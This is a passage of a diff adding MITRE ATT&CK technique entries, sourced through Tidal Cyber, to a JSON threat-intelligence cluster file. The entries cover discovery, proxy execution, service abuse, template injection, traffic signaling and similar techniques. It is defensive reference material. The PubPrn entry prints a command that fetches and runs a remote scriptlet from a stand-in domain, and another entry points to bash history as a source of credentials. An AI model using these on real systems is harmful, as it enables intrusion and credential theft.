}, + { + "dest-uuid": "4c7c0caa-b9bc-5d63-b5c3-812fdf3bba8a", + "type": "similar" + } + ], + "uuid": "adb6b8c1-2bdb-42b9-95da-5ce07e8796f7", + "value": "System Network Configuration Discovery" + }, + { + "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. \n\nAn adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.[[Amazon AWS VPC Guide](https://app.tidalcyber.com/references/7972332d-fbe9-4f14-9511-4298f65f2a86)][[Microsoft Azure Virtual Network Overview](https://app.tidalcyber.com/references/bf7f2e7a-f5ae-4b6e-8c90-fd41a92c4615)][[Google VPC Overview](https://app.tidalcyber.com/references/9ebe53cf-657f-475d-85e4-9e30f4af1e7d)] Similarly, adversaries who gain access to network devices may also perform similar discovery activities to gather information about connected systems and services.\n\nUtilities and commands that acquire this information include [netstat](https://app.tidalcyber.com/software/132fb908-9f13-4bcf-aa64-74cbc72f5491), \"net use,\" and \"net session\" with [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc). In Mac and Linux, [netstat](https://app.tidalcyber.com/software/132fb908-9f13-4bcf-aa64-74cbc72f5491) and lsof can be used to list current connections. who -a and w can be used to show which users are currently logged in, similar to \"net session\". Additionally, built-in features native to network devices and [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) may be used (e.g. show ip sockets, show tcp brief).[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]", + "meta": { + "platforms": [ + "IaaS", + "Linux", + "macOS", + "Network", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + } + ], + "uuid": "0d258912-58b1-4982-b90f-eed576f05ffc", + "value": "System Network Connections Discovery" + }, + { + "description": "Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://app.tidalcyber.com/technique/86e6f1f0-290b-4971-b50e-80e98a0a768b) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nVarious utilities and commands may acquire this information, including whoami. In macOS and Linux, the currently logged in user can be identified with w and who. On macOS the dscl . list /Users | grep -v '_' command can also be used to enumerate user accounts. Environment variables, such as %USERNAME% and $USER, may also be used to access this information.\n\nOn network devices, [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands such as `show users` and `show ssh` can be used to display users currently logged into the device.[[show_ssh_users_cmd_cisco](https://app.tidalcyber.com/references/11d34884-4559-57ad-8910-54e517c6493e)][[US-CERT TA18-106A Network Infrastructure Devices 2018](https://app.tidalcyber.com/references/8fdf280d-680f-4b8f-8fb9-6b3118ec3983)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Network", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + } + ], + "uuid": "86e6f1f0-290b-4971-b50e-80e98a0a768b", + "value": "System Owner/User Discovery" + }, + { + "description": "Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://app.tidalcyber.com/technique/0340ed34-6db2-4979-bf73-2c16855867b4) script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the [Windows Command Shell](https://app.tidalcyber.com/technique/be095bcc-4769-4010-b2db-3033d01efdbe) via Cscript.exe. For example, the following code publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com.[[pubprn](https://app.tidalcyber.com/references/c845c67a-20ab-405c-95fe-2f667f83b886)]\n\nAdversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.[[Enigma0x3 PubPrn Bypass](https://app.tidalcyber.com/references/8b12e87b-3836-4c79-877b-0a2761b34533)] To do so, adversaries may set the second script: parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.\n\nIn later versions of Windows (10+), PubPrn.vbs has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://, vice the script: moniker which could be used to reference remote code via HTTP(S).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1216.001" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "f46405a6-b9a3-4124-8bce-5a786038f28f", + "value": "PubPrn" + }, + { + "description": "Adversaries may use trusted scripts, often signed with certificates, to proxy the execution of malicious files. Several Microsoft signed scripts that have been downloaded from Microsoft or are default on Windows installations can be used to proxy execution of other files.[[LOLBAS Project](https://app.tidalcyber.com/references/14b1d3ab-8508-4946-9913-17e667956064)] This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.[[GitHub Ultimate AppLocker Bypass List](https://app.tidalcyber.com/references/a2fa7fb8-ddba-44cf-878f-448fb2aa6149)]", + "meta": { + "platforms": [ + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + }, + { + "dest-uuid": "f46405a6-b9a3-4124-8bce-5a786038f28f", + "type": "similar" + } + ], + "uuid": "e0d1825e-e46a-48f2-9b28-8346a39d39b0", + "value": "System Script Proxy Execution" + }, + { + "description": "Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as sc query, tasklist /svc, systemctl --type=service, and net start.\n\nAdversaries may use the information from [System Service Discovery](https://app.tidalcyber.com/technique/e0a347e2-2ac5-458b-ab0f-18d81b6d6055) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + } + ], + "uuid": "e0a347e2-2ac5-458b-ab0f-18d81b6d6055", + "value": "System Service Discovery" + }, + { + "description": "Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.[[Launchctl Man](https://app.tidalcyber.com/references/26bd50ba-c359-4804-b574-7ec731b37fa6)]\n\nAdversaries use launchctl to execute commands and programs as [Launch Agent](https://app.tidalcyber.com/technique/6dbe030c-5f87-4b45-9b6b-5bba2c0fad00)s or [Launch Daemon](https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27)s. Common subcommands include: launchctl load,launchctl unload, and launchctl start. Adversaries can use scripts or manually run the commands launchctl load -w \"%s/Library/LaunchAgents/%s\" or /bin/launchctl load to execute [Launch Agent](https://app.tidalcyber.com/technique/6dbe030c-5f87-4b45-9b6b-5bba2c0fad00)s or [Launch Daemon](https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27)s.[[Sofacy Komplex Trojan](https://app.tidalcyber.com/references/a21be45e-26c3-446d-b336-b58d08df5749)][[20 macOS Common Tools and Techniques](https://app.tidalcyber.com/references/3ee99ff4-daf4-4776-9d94-f7cf193c2b0c)]\n", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1569.001" + }, + "related": [ + { + "dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44", + "type": "uses" + } + ], + "uuid": "8edc6345-c423-4872-9e22-11e22d9164ff", + "value": "Launchctl" + }, + { + "description": "Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe) is an interface to manage and manipulate services.[[Microsoft Service Control Manager](https://app.tidalcyber.com/references/00d22c6d-a51a-4107-bf75-53ec3330db92)] The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe and [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc).\n\n[PsExec](https://app.tidalcyber.com/software/73eb32af-4bd3-4e21-8048-355edc55a9c6) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.[[Russinovich Sysinternals](https://app.tidalcyber.com/references/72d27aca-62c5-4e96-9977-c41951aaa888)] Tools such as [PsExec](https://app.tidalcyber.com/software/73eb32af-4bd3-4e21-8048-355edc55a9c6) and sc.exe can accept remote servers as arguments and may be used to conduct remote execution.\n\nAdversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with [Windows Service](https://app.tidalcyber.com/technique/31c6dd3c-3eb2-46a9-ab85-9e8e145810a1) during service persistence or privilege escalation.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1569.002" + }, + "related": [ + { + "dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44", + "type": "uses" + } + ], + "uuid": "68427c7d-f65a-4545-abfd-13d69e5e50cf", + "value": "Service Execution" + }, + { + "description": "Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services either locally or remotely. Many services are set to run at boot, which can aid in achieving persistence ([Create or Modify System Process](https://app.tidalcyber.com/technique/f8aa018b-5134-4201-87f2-e55d20f40b17)), but adversaries can also abuse services for one-time or temporary execution.", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44", + "type": "uses" + }, + { + "dest-uuid": "8edc6345-c423-4872-9e22-11e22d9164ff", + "type": "similar" + }, + { + "dest-uuid": "68427c7d-f65a-4545-abfd-13d69e5e50cf", + "type": "similar" + } + ], + "uuid": "a2300ed3-a502-4fe4-bad5-4aa1efc72941", + "value": "System Services" + }, + { + "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) (e.g. reload).[[Microsoft Shutdown Oct 2017](https://app.tidalcyber.com/references/c587f021-596a-4e63-ac51-afa2793a859d)][[alert_TA18_106A](https://app.tidalcyber.com/references/26b520dc-5c68-40f4-82fb-366d27fc0c2f)]\n\nShutting down or rebooting systems may disrupt access to computer resources for legitimate users while also impeding incident response/recovery.\n\nAdversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://app.tidalcyber.com/technique/14a944d3-ab95-40d8-b069-ccc4824ef46d) or [Inhibit System Recovery](https://app.tidalcyber.com/technique/d207c03b-fbe7-420e-a053-339f4650c043), to hasten the intended effects on system availability.[[Talos Nyetya June 2017](https://app.tidalcyber.com/references/c76e806c-b0e3-4ab9-ba6d-68a9f731f127)][[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Network", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f", + "type": "uses" + } + ], + "uuid": "24787dca-6afd-4ab3-ab6c-32e9486ec418", + "value": "System Shutdown/Reboot" + }, + { + "description": "An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. [[MSDN System Time](https://app.tidalcyber.com/references/5e15e03b-be8b-4f3d-a3ae-0df7a4ecfbec)][[Technet Windows Time Service](https://app.tidalcyber.com/references/0d908e07-abc1-40fc-b147-9b9fd483b262)]\n\nSystem time information may be gathered in a number of ways, such as with [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) on Windows by performing net time \\\\hostname to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz.[[Technet Windows Time Service](https://app.tidalcyber.com/references/0d908e07-abc1-40fc-b147-9b9fd483b262)]\n\nOn network devices, [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands such as `show clock detail` can be used to see the current time configuration.[[show_clock_detail_cisco_cmd](https://app.tidalcyber.com/references/a2215813-31b0-5624-92d8-479e7bd1a30b)]\n\nThis information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://app.tidalcyber.com/technique/0baf02af-ffaa-403f-9f0d-da51f463a1d8)[[RSA EU12 They're Inside](https://app.tidalcyber.com/references/8330ab88-9c73-4332-97d6-c1fb95b1a155)], or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://app.tidalcyber.com/technique/90e6a093-3e87-4d74-8b68-38c7d7e5e93c)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.[[AnyRun TimeBomb](https://app.tidalcyber.com/references/cd369bf9-80a8-426f-a0aa-c9745b40696c)]", + "meta": { + "platforms": [ + "Network", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + } + ], + "uuid": "2e634ff1-a4ea-41b4-8ee9-23db4627a986", + "value": "System Time Discovery" + }, + { + "description": "\nAdversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.\n\nA directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://app.tidalcyber.com/technique/bfde0a09-8109-41e4-b8c9-68fe20e8131b) of directory .LNK files that use [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) to look like the real directories, which are hidden through [Hidden Files and Directories](https://app.tidalcyber.com/technique/14e81a2d-9eca-429c-9fb9-08e109de9f6c). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. [[Retwin Directory Share Pivot](https://app.tidalcyber.com/references/027c5274-6b61-447a-9058-edb844f112dd)]\n\nAdversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Office 365", + "SaaS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb", + "type": "uses" + } + ], + "uuid": "58987d0d-2ebf-4783-90ac-5164fe9b9e43", + "value": "Taint Shared Content" + }, + { + "description": "Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.[[Microsoft Open XML July 2017](https://app.tidalcyber.com/references/8145f894-6477-4629-81de-1dd26070ee0a)]\n\nProperties within parts may reference shared public resources accessed via online URLs. For example, template properties may reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.\n\nAdversaries may abuse these templates to initially conceal malicious code to be executed via user documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded.[[SANS Brian Wiltse Template Injection](https://app.tidalcyber.com/references/8c010c87-865b-4168-87a7-4a24db413def)] These documents can be delivered via other techniques such as [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) and/or [Taint Shared Content](https://app.tidalcyber.com/technique/58987d0d-2ebf-4783-90ac-5164fe9b9e43) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched.[[Redxorblue Remote Template Injection](https://app.tidalcyber.com/references/bce1cd78-b55e-40cf-8a90-64240db867ac)] Examples have been seen in the wild where template injection was used to load malicious code containing an exploit.[[MalwareBytes Template Injection OCT 2017](https://app.tidalcyber.com/references/7ef0ab1f-c7d6-46fe-b489-fab4db623e0a)]\n\nAdversaries may also modify the *\\template control word within an .rtf file to similarly conceal then download malicious code. This legitimate control word value is intended to be a file destination of a template file resource that is retrieved and loaded when an .rtf file is opened. However, adversaries may alter the bytes of an existing .rtf file to insert a template control word field to include a URL resource of a malicious payload.[[Proofpoint RTF Injection](https://app.tidalcyber.com/references/8deb6edb-293f-4b9d-882a-541675864eb5)][[Ciberseguridad Decoding malicious RTF files](https://app.tidalcyber.com/references/82d2451b-300f-4891-b1e7-ade53dff1126)]\n\nThis technique may also enable [Forced Authentication](https://app.tidalcyber.com/technique/e732e1d4-fffa-4fc3-b387-47782c821688) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt.[[Anomali Template Injection MAR 2018](https://app.tidalcyber.com/references/3cdeb2a2-9582-4725-a132-6503dbe04e1d)][[Talos Template Injection July 2017](https://app.tidalcyber.com/references/175ea537-2a94-42c7-a83b-bec8906ee6b9)][[ryhanson phishery SEPT 2016](https://app.tidalcyber.com/references/7e643cf0-5df7-455d-add7-2342f36bdbcb)]", + "meta": { + "platforms": [ + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "02b8e7c1-0db7-43f5-a5bc-531b30395122", + "value": "Template Injection" + }, + { + "description": "Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.\n\nThis technique has been observed both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.\n\nThe observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r [[Hartrell cd00r 2002](https://app.tidalcyber.com/references/739e6517-10f5-484d-8000-8818d63e7341)], is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1205.001" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + }, + { + "dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb", + "type": "uses" + } + ], + "uuid": "34a112db-c61d-4ea2-872f-de3fc1af87a3", + "value": "Port Knocking" + }, + { + "description": "Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.\n\nTo establish a connection, an adversary sends a crafted packet to the targeted host that matches the installed filter criteria.[[haking9 libpcap network sniffing](https://app.tidalcyber.com/references/2803d0b8-78ee-4b19-aad3-daf84cd292b5)] Adversaries have used these socket filters to trigger the installation of implants, conduct ping backs, and to invoke command shells. Communication with these socket filters may also be used in conjunction with [Protocol Tunneling](https://app.tidalcyber.com/technique/bd677092-d197-4230-b94a-438cb24260fd).[[exatrack bpf filters passive backdoors](https://app.tidalcyber.com/references/84ffd130-97b9-4bbf-bc3e-42accdf248ce)][[Leonardo Turla Penquin May 2020](https://app.tidalcyber.com/references/09d8bb54-6fa5-4842-98aa-6e9656a19092)]\n\nFilters can be installed on any Unix-like platform with `libpcap` installed or on Windows hosts using `Winpcap`. Adversaries may use either `libpcap` with `pcap_setfilter` or the standard library function `setsockopt` with `SO_ATTACH_FILTER` options. Since the socket connection is not active until the packet is received, this behavior may be difficult to detect due to the lack of activity on a host, low CPU overhead, and limited visibility into raw socket usage.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1205.002" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + }, + { + "dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb", + "type": "uses" + } + ], + "uuid": "f0dd515b-51cf-4853-a20c-02226d099ee0", + "value": "Socket Filters" + }, + { + "description": "Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://app.tidalcyber.com/technique/34a112db-c61d-4ea2-872f-de3fc1af87a3)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.\n\nAdversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).\n\nThe observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r [[Hartrell cd00r 2002](https://app.tidalcyber.com/references/739e6517-10f5-484d-8000-8818d63e7341)], is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.\n\nOn network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://app.tidalcyber.com/technique/195aa08b-15fd-4019-b905-8f31bc5e2094) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities. Adversaries may use crafted packets to attempt to connect to one or more (open or closed) ports, but may also attempt to connect to a router interface, broadcast, and network address IP on the same port in order to achieve their goals and objectives.[[Cisco Synful Knock Evolution](https://app.tidalcyber.com/references/29301297-8343-4f75-8096-7fe229812f75)][[Mandiant - Synful Knock](https://app.tidalcyber.com/references/1f6eaa98-9184-4341-8634-5512a9c632dd)][[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)] To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://app.tidalcyber.com/technique/630a17c1-0176-4764-8f5c-a83f4f3e980f) due to the monolithic nature of the architecture.\n\nAdversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.[[Bleeping Computer - Ryuk WoL](https://app.tidalcyber.com/references/f6670b73-4d57-4aad-8264-1d42d585e280)][[AMD Magic Packet](https://app.tidalcyber.com/references/06d36dea-e13d-48c4-b6d6-0c175c379f5b)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Network", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + }, + { + "dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb", + "type": "uses" + }, + { + "dest-uuid": "34a112db-c61d-4ea2-872f-de3fc1af87a3", + "type": "similar" + }, + { + "dest-uuid": "f0dd515b-51cf-4853-a20c-02226d099ee0", + "type": "similar" + } + ], + "uuid": "c2cf211a-9676-4922-a386-69697ab4934a", + "value": "Traffic Signaling" + }, + { + "description": "Adversaries may exfiltrate data by transferring the data, including backups of cloud environments, to another cloud account they control on the same service to avoid typical file transfers/downloads and network-based exfiltration detection.\n\nA defender who is monitoring for large transfers to outside the cloud environment through normal file transfers or over command and control channels may not be watching for data transfers to another account within the same cloud provider. Such transfers may utilize existing cloud provider APIs and the internal address space of the cloud provider to blend into normal traffic or avoid data transfers over external network interfaces.\n\nIncidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.[[DOJ GRU Indictment Jul 2018](https://app.tidalcyber.com/references/d65f371b-19d0-49de-b92b-94a2bea1d988)] ", + "meta": { + "platforms": [ + "IaaS" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023", + "type": "uses" + } + ], + "uuid": "ab4f22d6-465f-4a16-8a40-693f2234c4ac", + "value": "Transfer Data to Cloud Account" + }, + { + "description": "Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.[[MSDN MSBuild](https://app.tidalcyber.com/references/9ad54187-84b0-47f9-af6e-c3753452e470)]\n\nAdversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file.[[MSDN MSBuild](https://app.tidalcyber.com/references/9ad54187-84b0-47f9-af6e-c3753452e470)][[Microsoft MSBuild Inline Tasks 2017](https://app.tidalcyber.com/references/2c638ca5-c7e2-4c4e-bb9c-e36d14899ca8)] MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.[[LOLBAS Msbuild](https://app.tidalcyber.com/references/de8e0741-255b-4c41-ba50-248ac5acc325)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1127.001" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "4aa6466a-f7ca-4dae-b272-73ca23f0df8f", + "value": "MSBuild" + }, + { + "description": "Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.[[engima0x3 DNX Bypass](https://app.tidalcyber.com/references/e0186f1d-100d-4e52-b6f7-0a7e1c1a35f0)][[engima0x3 RCSI Bypass](https://app.tidalcyber.com/references/0b815bd9-6c7f-4bd8-9031-667fa6252f89)][[Exploit Monday WinDbg](https://app.tidalcyber.com/references/abd5f871-e12e-4355-af72-d4be79cb0291)][[LOLBAS Tracker](https://app.tidalcyber.com/references/f0e368f1-3347-41ef-91fb-995c3cb07707)] These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.", + "meta": { + "platforms": [ + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + }, + { + "dest-uuid": "4aa6466a-f7ca-4dae-b272-73ca23f0df8f", + "type": "similar" + } + ], + "uuid": "8811114c-a0cf-479c-b95d-c036467749e3", + "value": "Trusted Developer Utilities Proxy Execution" + }, + { + "description": "Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.\n\nOrganizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) used by the other party for access to internal network systems may be compromised and used.[[CISA IT Service Providers](https://app.tidalcyber.com/references/b8bee7f9-155e-4765-9492-01182e4435b7)]\n\nIn Office 365 environments, organizations may grant Microsoft partners or resellers delegated administrator permissions. By compromising a partner or reseller account, an adversary may be able to leverage existing delegated administrator relationships or send new delegated administrator offers to clients in order to gain administrative control over the victim tenant.[[Office 365 Delegated Administration](https://app.tidalcyber.com/references/fa0ed0fd-bf57-4a0f-9370-e22f27b20e42)]", + "meta": { + "platforms": [ + "IaaS", + "Linux", + "macOS", + "Office 365", + "SaaS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c", + "type": "uses" + } + ], + "uuid": "7549c2f9-b5d2-4773-90ed-42f668aecacf", + "value": "Trusted Relationship" + }, + { + "description": "Adversaries may search the bash command history on compromised systems for insecurely stored credentials. Bash keeps track of the commands users type on the command-line with the \"history\" utility. Once a user logs out, the history is flushed to the user’s .bash_history file. For each user, this file resides at the same location: ~/.bash_history. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Adversaries can abuse this by looking through the file for potential credentials. 